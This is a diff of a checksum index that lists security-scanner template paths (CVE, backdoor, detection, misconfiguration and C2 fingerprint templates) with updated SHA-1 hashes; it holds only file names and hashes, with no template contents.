@@ -2656,6 +2657,7 @@ http/cves/2023/CVE-2023-42442.yaml:c6e765cc76d6e24c920ac246e83837e68011c2fd
http/cves/2023/CVE-2023-4568.yaml:a40438e923a862215d522cfad6534b0fb3374249
http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042
+http/cves/2023/CVE-2023-5074.yaml:439a4e67d8763ee84d57902b062f1fc464e11453
http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d
http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2
http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6
@@ -4505,6 +4507,7 @@ http/misconfiguration/installer/impresspages-installer.yaml:0d25cc61a9726b3527e2
http/misconfiguration/installer/indegy-sensor-installer.yaml:c4b65b906536d0e71d9128a43b1bbf31c7c6ad55
http/misconfiguration/installer/jira-setup.yaml:98368f306cef91d92ecd53725eca807b2cf1af2a
http/misconfiguration/installer/joomla-installer.yaml:9f89a6d16c8fef98b9a4de986d22768b2aa76895
+http/misconfiguration/installer/klr300n-installer.yaml:24c4c70cfdf1cfbde3df5ce9bdad6c9822383e1a
http/misconfiguration/installer/limesurvey-installer.yaml:54fa5e339c11fa21e16c99344948bfcd4c854335
http/misconfiguration/installer/lmszai-installer.yaml:bd5e1d6df6913b83a85555d8015ece59b19bf27a
http/misconfiguration/installer/lychee-installer.yaml:54b1ca8400339d8ce3442109dea8356a809288a2
@@ -4522,7 +4525,7 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:d9b8f35bbf4
http/misconfiguration/installer/nginx-auto-installer.yaml:a45c4bc03311eb33170957d65fa62b0a194427d6
http/misconfiguration/installer/nodebb-installer.yaml:7a5df25da7163e43f58532154f602652d0b013cc
http/misconfiguration/installer/nopcommerce-installer.yaml:4568895e83d6888dd2e4eefb6df641258b227f79
-http/misconfiguration/installer/ojs-installer.yaml:a8737d5a86376bda445e5fe2c141143a79cf5e29
+http/misconfiguration/installer/ojs-installer.yaml:7317b5f8e060b50bc6d4c41a04f529ac758b12ed
http/misconfiguration/installer/openmage-install.yaml:4aa42695d5062c627d4290348a5459f57ecf5a14
http/misconfiguration/installer/openshift-installer-panel.yaml:d8a752d34b8064b82613b1fdd6c70c3dc16bb6ff
http/misconfiguration/installer/opensis-installer.yaml:b2b80ff3af51a7ccc9f2f70da8853f4a4ac0b85a
@@ -5998,8 +6001,8 @@ http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9
http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
-http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
+http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c
+http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5
http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
@@ -7050,90 +7053,90 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b
http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:867377dd72eed091ea11ee05778c06855a5aef2b
http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:68c6f8ed4ebd17880e69cb75ff46e4594f9b1274
http/vulnerabilities/zzzcms/zzzcms-xss.yaml:026425b2b85ab06c5db42d543763a9d6cfcc8794
-network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f
-network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232
-network/cves/2001/CVE-2001-1473.yaml:4145fb7f555bfac7ccca007a9fb5852758e106f2
-network/cves/2011/CVE-2011-2523.yaml:4ccb3e295a9d1767f6cbcb9a002612925bd6a515
-network/cves/2015/CVE-2015-3306.yaml:3c84863be8c2479425260df77377099bb9fd9478
-network/cves/2016/CVE-2016-2004.yaml:06a7c58f1150be1ce743ede2cf57f09379479ae2
-network/cves/2016/CVE-2016-3510.yaml:2850b8cede8767d64635c87818c2dbeaa0c12f12
-network/cves/2017/CVE-2017-3881.yaml:5a1798099302282f684b4e45404fee4eb239b5a8
-network/cves/2017/CVE-2017-5645.yaml:912a3a77c286cf1cfaa14bc57eb0be80419393c0
+network/backdoor/backdoored-zte.yaml:f2404c7da8bc8f4a0f44c9a98c954a0b70b6a6ca
+network/backdoor/vsftpd-backdoor.yaml:be584f958ad40909f5fd12048c1c70840e5b55fd
+network/cves/2001/CVE-2001-1473.yaml:3533c4dd73e57282133423457b202f16ce6b8dac
+network/cves/2011/CVE-2011-2523.yaml:827f6785ecdf7e6e387253450f502995bc2cf5c3
+network/cves/2015/CVE-2015-3306.yaml:55a8f518a54a533a10b30e3bd93ba1039bdb1f0e
+network/cves/2016/CVE-2016-2004.yaml:eaeffebb559fa76744fd7fd1b779b5e5521dbeb0
+network/cves/2016/CVE-2016-3510.yaml:ab649b2bd1a9eda70cb43d600b6320c45f01806e
+network/cves/2017/CVE-2017-3881.yaml:b97e5e80d981cb76446c857d349e7d3fb63bd9a9
+network/cves/2017/CVE-2017-5645.yaml:385b1455ebbddb6136054cd2886c87f50818135d
network/cves/2018/CVE-2018-2628.yaml:f823ce8c5d0f0f9947a5131c6fe61f0edd98ad0d
-network/cves/2018/CVE-2018-2893.yaml:0747425f4e3eb128e08736b1aaca8872266c580d
-network/cves/2020/CVE-2020-11981.yaml:6797dad5754668382eb920b2ac5c294da9398fa2
-network/cves/2020/CVE-2020-1938.yaml:87d1735c3efbd037c2c0669e4d6ef6d195858d12
-network/cves/2020/CVE-2020-7247.yaml:fc45c678e38dc35825a377e30e8ef66b9360c660
-network/cves/2021/CVE-2021-44521.yaml:40361b30bb6231972a24076b80cdb0ed85b05279
-network/cves/2022/CVE-2022-0543.yaml:a27a67b45dfceaef860fd6c59bd22394145882cb
-network/cves/2022/CVE-2022-24706.yaml:4a036736022e99e18a148bd86a3894d95b151084
+network/cves/2018/CVE-2018-2893.yaml:99800642b6815c2ddd46dbdac4c51206b467271e
+network/cves/2020/CVE-2020-11981.yaml:d73e69b51496835f55e58fabb67992aa6635203c
+network/cves/2020/CVE-2020-1938.yaml:887bd58e985526a366f67962db239a627e9e5181
+network/cves/2020/CVE-2020-7247.yaml:9ed3065e9ee6c3f121fe08a6117d586ff352eb8c
+network/cves/2021/CVE-2021-44521.yaml:2cc6438637f42c0e34ecc68f2459b050ededd971
+network/cves/2022/CVE-2022-0543.yaml:c9f0f01774372aae54622c97b9a68ce5997cc3b2
+network/cves/2022/CVE-2022-24706.yaml:3fcf75994b8852f37271048b9af452f602c79a95
network/cves/2022/CVE-2022-31793.yaml:ac870c80a1d17e215fc1357d257cdd07f2aca8da
-network/cves/2023/CVE-2023-33246.yaml:cd9f687e6cb2d556fcf07482f242a3703180d023
-network/default-login/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829
-network/default-login/ftp-weak-credentials.yaml:d4749ba120717dc1f34f263bc2d9413c2f9662d0
-network/default-login/ldap-anonymous-login.yaml:48fa5969a454ef01ca1cc73deb5423f764de8790
-network/detection/activemq-openwire-transport-detect.yaml:5341048ef6135611d6586414227704e61bf710eb
-network/detection/apache-activemq-detect.yaml:96a3df34ded2f9707a536d0fc05eb0d7414749d2
-network/detection/axigen-mail-server-detect.yaml:f1316025d891e64008612574e3fd895bb7aca99f
-network/detection/cisco-finger-detect.yaml:b276bbcf3d47e682f18155685150f07cedf698e5
-network/detection/clamav-detect.yaml:f856880b2fbc4d968e3bb45782c200277487e441
-network/detection/cql-native-transport.yaml:3d6e54aa9773e16aa2e9c75f61462bf1d45a8205
-network/detection/detect-addpac-voip-gateway.yaml:25eca59ccaf9984df28dd1c01dd4d58c67c23dfd
-network/detection/detect-jabber-xmpp.yaml:8aa9448785a0dc82118ffc8b9af51e928cd60c60
-network/detection/dotnet-remoting-service-detect.yaml:fb9338dba6ec3d7e5cb5a97f220d451c33594c9c
-network/detection/dropbear-cbc-ciphers.yaml:c9e37bbd3d8025d202c9871620fcf07ec5f3f389
-network/detection/esmtp-detect.yaml:a40b86cde437aad247271dbffb12fd488e3b097a
-network/detection/expn-mail-detect.yaml:ea9b02907ca016b2f52e153cbdaab31777064c78
-network/detection/finger-detect.yaml:b633bc4e54f3cf5421cf90d17d607d502db8a6e5
-network/detection/gnu-inetutils-ftpd-detect.yaml:13032bebe217b19d1069ebb90b8855ad019fda28
-network/detection/gopher-detect.yaml:63356156c5578e594b630bc0e7b341ca2e12a30c
-network/detection/ibm-d2b-database-server.yaml:7532b5b14424f0bfdeeac34f2883d1e958da3b3c
-network/detection/imap-detect.yaml:792e8e90cc05dd94184c7e2e584f55a2e9d0d253
-network/detection/iplanet-imap-detect.yaml:797804466967f502f94cb46f786ea756640df995
+network/cves/2023/CVE-2023-33246.yaml:31795e9d41202a88961af586a1d947fa60d90246
+network/default-login/ftp-anonymous-login.yaml:20a6c899ab3d67d5e178c0d167d8fce637945c1a
+network/default-login/ftp-weak-credentials.yaml:40ce5a09aff1c80a461d2acebb8cb3816bda9779
+network/default-login/ldap-anonymous-login.yaml:5ceeb7c64897a0469e3b9e5a2ec925567c0a8925
+network/detection/activemq-openwire-transport-detect.yaml:a2a7d1d1be98ebc53229cce7b9a75e0aefc516b2
+network/detection/apache-activemq-detect.yaml:15b56708cf6d6f8dca783cb40b6d3f9b1ffb765d
+network/detection/axigen-mail-server-detect.yaml:658eaaf7b6ae1a881862207802800b3052d0324d
+network/detection/cisco-finger-detect.yaml:b242374a1df790541b766f4f0e36666a2a7549c5
+network/detection/clamav-detect.yaml:8616e250aa69c74ff903919b6cff28a77c4ae075
+network/detection/cql-native-transport.yaml:ccd025169c99c719b79d13cf8b72a58559321a07
+network/detection/detect-addpac-voip-gateway.yaml:86931a2b160f7ffb63386c2add91b28f91648595
+network/detection/detect-jabber-xmpp.yaml:94388107835fcf3923fb0151ff02b4b9a35d829c
+network/detection/dotnet-remoting-service-detect.yaml:ecae3ec87ce7d816448d05a5b611fcc4ce248407
+network/detection/dropbear-cbc-ciphers.yaml:896bdca3f90b65c9c6013438d67eb8c95389f6d8
+network/detection/esmtp-detect.yaml:470b3c4eecbc6946f1af9755fb0e934d91e2ab86
+network/detection/expn-mail-detect.yaml:e10d98af34370bdc982563d1878f8f558e197ecf
+network/detection/finger-detect.yaml:eab8109135becb245495b39e84f6123721586bfd
+network/detection/gnu-inetutils-ftpd-detect.yaml:c2e348774b35f11a845bcb7c2a726df335749b80
+network/detection/gopher-detect.yaml:3901b4cf94fbb3661b0aeb904a38f3f6b8194c80
+network/detection/ibm-d2b-database-server.yaml:9c219e670702e3369473a0c68fafbc8d75a87ab0
+network/detection/imap-detect.yaml:711c3da60996bbd7175b494caabb90523febbca4
+network/detection/iplanet-imap-detect.yaml:6252d0cd1de590c9de0ee8ac5bf9968d45b1234e
network/detection/java-rmi-detect.yaml:d724183dc184431e03ed5c8274421665c7bda989
-network/detection/microsoft-ftp-service.yaml:92b1c3349e9f029e476f9d13798797fc45906ee4
-network/detection/mikrotik-ftp-server-detect.yaml:c43d32e0437d4e6b1188ad7fdce3ab17d4329938
-network/detection/mikrotik-routeros-api.yaml:cabbd4773b4fe9287d47cc42ea78d30c9562f1e3
-network/detection/mongodb-detect.yaml:2c765e6540b259f964bb53cb01ff81a64c80a78b
-network/detection/msmq-detect.yaml:5d977a358a7a5bbc1837ce60bdc31af7df92d59b
-network/detection/mysql-detect.yaml:4c716a0a7a60b45626cd756a2c949ca9e31439cb
-network/detection/openssh-detect.yaml:84efaa8f67216536f0e879a983157f364c0c27de
-network/detection/pgsql-detect.yaml:2d8931b96bf60405c27040a2b26fb8402ab524f9
-network/detection/pop3-detect.yaml:63f7b18a6aa15bf1ebb13c26a094c48b3607a203
-network/detection/proftpd-server-detect.yaml:0364267073c68f8c76a58c785b7295b7101aa87c
-network/detection/rabbitmq-detect.yaml:4ea11fe71f516437ee18948bef434aafc57eca62
-network/detection/rdp-detect.yaml:eed3037c8e3caf6e57e40d767f2456e423e91384
-network/detection/redis-detect.yaml:55fb1ac0ec017cc8870f1ca389ba3e9284c414ce
-network/detection/riak-detect.yaml:73cddd9093f8e8526acc0d9b9b5457306749ec34
-network/detection/rpcbind-portmapper-detect.yaml:64093f99eb18abeb9a85721e6a44b3a4d26d57e3
-network/detection/rsyncd-service-detect.yaml:5c3f80f8c0e34c9273c639b5083f044f1e16a5ea
-network/detection/rtsp-detect.yaml:6ab1273e3c9a6bc2b7655ba3cc88ece640e5cd5c
-network/detection/samba-detect.yaml:f9f2fdf3001bac13094a48958b3a32489d46564b
-network/detection/sap-router.yaml:4d28d97202f3fdfa85d69a06b008d13ebd1e697c
-network/detection/smb-detect.yaml:5e42e55f8f85322f4db93767ab90a895db57f76c
-network/detection/smtp-detect.yaml:c059ef31c5bb6b3ecbff0fbe5e8283344b29ac27
-network/detection/sshd-dropbear-detect.yaml:7c972bdaa3dfbcd1173e3374998ff874f13d2da7
-network/detection/starttls-mail-detect.yaml:66fc7ae7adabd5060d46c12e42a1cab23d1ea933
-network/detection/teamspeak3-detect.yaml:cad767eb30c1407e7d8978102f7294b48f004378
-network/detection/telnet-detect.yaml:42d2d700d5d2505efe90dad20055132528312f13
-network/detection/totemomail-smtp-detect.yaml:59d077ac0097a20fd58a5cf017d54fd7481f278c
-network/detection/vmware-authentication-daemon-detect.yaml:81fe7f8be7c047f43a06b421b8d6ef1b97e25e50
-network/detection/vnc-service-detect.yaml:75bdf9c29f7666004c92b3f7183dec085e8126df
+network/detection/microsoft-ftp-service.yaml:e50fb87b704d9e1afca92335bff43102192c4ea4
+network/detection/mikrotik-ftp-server-detect.yaml:a044ce5ddf8d1511272d3be61e2a6ac1fae65dd9
+network/detection/mikrotik-routeros-api.yaml:39f157753ce8be7239d12494e5f7b458f79cf347
+network/detection/mongodb-detect.yaml:f2d353e05a121675c34ad57d7b75888342b2fa24
+network/detection/msmq-detect.yaml:4c3895d1a669b762a75ad31aac269090c48a55bf
+network/detection/mysql-detect.yaml:e1bc919065aa2b6272dae784d33d77e0733757c8
+network/detection/openssh-detect.yaml:e4e89cbf2e5603105b2c106259ee6ed3ea5e907e
+network/detection/pgsql-detect.yaml:b71235f0e0a89752d8a6529cfb2f6df7ac4dcec7
+network/detection/pop3-detect.yaml:4dfb3a5e10ac41f9d08912ce25e5895512f348a2
+network/detection/proftpd-server-detect.yaml:f8e31581df48389c3cdadcd7a1ed6d35adbe2099
+network/detection/rabbitmq-detect.yaml:69219a94f9425ecf96ee9e9678711cfcbd87b797
+network/detection/rdp-detect.yaml:86666e40065620d31395570f8d80e6adbe4dde3e
+network/detection/redis-detect.yaml:7ef522d24e9e0914ff5367bc5fa42d1b46323fa4
+network/detection/riak-detect.yaml:547e4a1204dc2fde23d40e1bc162ab2a161bebc0
+network/detection/rpcbind-portmapper-detect.yaml:e81701b944f44e94cbe6f82e2c3ba4f71c3cb28c
+network/detection/rsyncd-service-detect.yaml:007ce06c7619746977e4d4aacdb505397ff54376
+network/detection/rtsp-detect.yaml:41b325b0bedc536f795d5b108eab0809b5fb7645
+network/detection/samba-detect.yaml:1d01568e7fc2462ce96c515723afe281f5894171
+network/detection/sap-router.yaml:4f748f58cf50d3a389217e892eb7d8c9eed4c064
+network/detection/smb-detect.yaml:b0c061673b26b5a60fa6f2e0eb20de37c08ba66b
+network/detection/smtp-detect.yaml:4cb698e3aef0566a80be0f15ad73d05d98dcc2f5
+network/detection/sshd-dropbear-detect.yaml:dc663f0b684b4c5a0443171ac324a65e88a91353
+network/detection/starttls-mail-detect.yaml:76b6099c08373bc8c49dc0bf4a67ee8598c7811b
+network/detection/teamspeak3-detect.yaml:db3d1ee5ab40f3d460f4463329ab757152df6aa1
+network/detection/telnet-detect.yaml:8fbcde5667ca617d7e35844cc4573fc806470eb6
+network/detection/totemomail-smtp-detect.yaml:67399b872a46c4042a6d7cc2242fbda598fe80e1
+network/detection/vmware-authentication-daemon-detect.yaml:c3200055ad0072a42b7c7e67374d348f236b2ded
+network/detection/vnc-service-detect.yaml:fe0054cc1b77b69404d2f446676403f252b82b98
network/detection/weblogic-iiop-detect.yaml:94b8c1aaec6ffabca45c86cfb25b3a609e30bdfe
network/detection/weblogic-t3-detect.yaml:ce204c445556d0e1e07af1f6aaa65ee9c817d252
-network/detection/xlight-ftp-service-detect.yaml:709c4f6625b56fb99b25ba9992167c48b44a107d
-network/enumeration/beanstalk-service.yaml:ff6de1500ec329dac7a3d24d8e92f9fe8518f1de
-network/enumeration/kafka-topics-list.yaml:c169fb5b159e4ea9c9a86122afd1b0f0c4fa4943
-network/enumeration/mongodb-info-enum.yaml:137dd278383c71d517fc341a852fb786ace9daad
-network/enumeration/niagara-fox-info-enum.yaml:4d28582676b275af6cadc3bc63ad5ba278bcf856
-network/enumeration/psql-user-enum.yaml:0a2f5b0095347687d51554f03cd5141463855dd0
-network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42
-network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43
-network/exposures/cisco-smi-exposure.yaml:22368c9dd2c17aa863f31268713da67650c498b1
-network/exposures/exposed-adb.yaml:51e6daeb3e5bed63b7d45f37e037e67e971adf16
-network/exposures/exposed-dockerd.yaml:0fbaae44d57f346911a4ebca079bcf165b8a4c85
-network/exposures/exposed-redis.yaml:e9480d8e9207c6e5933482cfcff732a8abb8b3a0
-network/exposures/exposed-zookeeper.yaml:44b26aa0b0b3bc628ff494ed455edd6043732d2a
+network/detection/xlight-ftp-service-detect.yaml:df09822d9cc6fa1b1e4f7f99bbacfc9c24160159
+network/enumeration/beanstalk-service.yaml:6b761f32a18de725b06376576ad12d85a4ebf832
+network/enumeration/kafka-topics-list.yaml:c90f512f4ec006edc4c6986c0728015fa8525358
+network/enumeration/mongodb-info-enum.yaml:b77a072348b1dacf4f8d530063fd1e5f47cfea3a
+network/enumeration/niagara-fox-info-enum.yaml:cd3fc20375db89c116c2c5dcb82e970c0ab3a73e
+network/enumeration/psql-user-enum.yaml:c4c232dd301986d3c29e04e06748f57438fb1e0e
+network/enumeration/smtp/smtp-user-enum.yaml:1d4749091fccd1b9fa25ee8b09f34c3b51592152
+network/enumeration/smtp-commands-enum.yaml:e28d80b6ecb2e283d43f58f74e3d1ba6c63455fb
+network/exposures/cisco-smi-exposure.yaml:c760fcd32e21fc17283ed9a02c09a571a3680f29
+network/exposures/exposed-adb.yaml:52627ae57853ac9a610d3e789905bd2c557d9de4
+network/exposures/exposed-dockerd.yaml:a690f5be8036ac62769b004e1354f6638fcaa87b
+network/exposures/exposed-redis.yaml:3887effd170b1f500a92bd2725b325d4d6b3ce05
+network/exposures/exposed-zookeeper.yaml:1b4fc1c2c6a2131c33a293a4655c4e0d3f4fe6b0
network/jarm/c2/cobalt-strike-c2-jarm.yaml:7bf85725d77f35262ff24b7678adc4461404b92e
network/jarm/c2/covenant-c2-jarm.yaml:71fe7c9b7f6f7fbef263204bf701a6a5a513eb1f
network/jarm/c2/deimos-c2-jarm.yaml:bcbf9501f84caefd8c9385a3575a3fb6c2fd4ce2
@@ -7150,22 +7153,22 @@ network/jarm/c2/posh-c2-jarm.yaml:06aa7bbb8f3cd637fde301b7eac9c83b68467f0c
network/jarm/c2/shad0w-c2-jarm.yaml:21d654db72d9fbefa32a7ec40d4a77616aa4a43a
network/jarm/c2/silenttrinity-c2-jarm.yaml:fdec712cc69eed900b0d7ba42187a0ea0e7bb95b
network/jarm/c2/sliver-c2-jarm.yaml:dd41a2f23026cb1ce6fab8fb12f3e4a82a2accc3
-network/misconfig/apache-dubbo-unauth.yaml:09668afcc0c2b0182f0bf739cb077295a979c353
-network/misconfig/apache-rocketmq-broker-unauth.yaml:d9cfd62b876feabd3952ddc4eaa6c996eb4876bc
-network/misconfig/clamav-unauth.yaml:559dfa23076118f5ce1d84ffd9a76efb5d1d4422
-network/misconfig/clickhouse-unauth.yaml:c47517fbfc5f4a0425f884c42ef218e776b92cbc
-network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6
-network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024
-network/misconfig/ganglia-xml-grid-monitor.yaml:62649538ea72479f23f8f454790b21388b8f56b6
-network/misconfig/memcached-stats.yaml:1d54fbf17762442553b9c16d16bf2776a42aa2b9
-network/misconfig/mongodb-unauth.yaml:2fd6f2959bb97ab660377dcfad6e9db4559b605e
-network/misconfig/mysql-native-password.yaml:ef8676ebf814fe1084e81eeaf9bf70b999ff8b45
-network/misconfig/printers-info-leak.yaml:cb6c13a840a2765acf43726c754aa243b0101199
-network/misconfig/sap-router-info-leak.yaml:008df0e634639e012bd67b242172b20d93b92630
-network/misconfig/tidb-native-password.yaml:ee468366b1737d416807ecb51feae7b35ed27a4f
-network/misconfig/tidb-unauth.yaml:98ce03032751882e00f5ea0880511d5aa356de74
-network/misconfig/unauth-psql.yaml:c54c9c89d460a71bc82267bd5737dbde45e53122
-network/vulnerabilities/clockwatch-enterprise-rce.yaml:fcfd279274514fa3474ff1b2d83f98c5463ff8c2
+network/misconfig/apache-dubbo-unauth.yaml:9fc2673de80d24caa065664242dfbd2eb1392eb4
+network/misconfig/apache-rocketmq-broker-unauth.yaml:aec4738a8ac3af859878ab933b173856d6c2be54
+network/misconfig/clamav-unauth.yaml:20adfce3848329dbb83e8f18a1e17ad8767f8ab8
+network/misconfig/clickhouse-unauth.yaml:4d0e9f50cdf7d2241db5ee84b8ccb207a46230c8
+network/misconfig/dropbear-weakalgo.yaml:27cdaa70b7fe79843b983b161e1fad88288a373b
+network/misconfig/dropbear-weakmac.yaml:760914a845a37654688bae793af4a4201c389482
+network/misconfig/ganglia-xml-grid-monitor.yaml:fc9b7c0872ffc3a33b0f680e53c0e1f74fb15544
+network/misconfig/memcached-stats.yaml:29b5e7465487bcd2328367ddc9c57ae4b30abafc
+network/misconfig/mongodb-unauth.yaml:1f53455484d54404a99989dd24d6c625018db29d
+network/misconfig/mysql-native-password.yaml:dc73cd03694628961e4c23e897004316f93d0437
+network/misconfig/printers-info-leak.yaml:e2db9eb3ecff671c0c3f68f0d150e4970895c0ed
+network/misconfig/sap-router-info-leak.yaml:ad7ae897ff318aa35b5191b6950022c9b17013ee
+network/misconfig/tidb-native-password.yaml:5a201045c715852806eb2f11c2d7320f428fd104
+network/misconfig/tidb-unauth.yaml:a2ae3b64fb37d676ab8343b68c77f98c0855997b
+network/misconfig/unauth-psql.yaml:eed9adc5419a909329f6f49eca32a1a1455963ee
+network/vulnerabilities/clockwatch-enterprise-rce.yaml:eb8bd907db57a3f2c47999d0bc026d17550f4e0c
ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55
ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a
ssl/c2/cobalt-strike-c2.yaml:fa3905fc13397006d2bdba8729cf4879f3ecf541
@@ -7192,7 +7195,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:c231fe51c6ebce79078483d2407f8f3ba3cefd42
+templates-checksum.txt:3fa9d3f4155f376df13f89495d8c7b190ad97a68
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f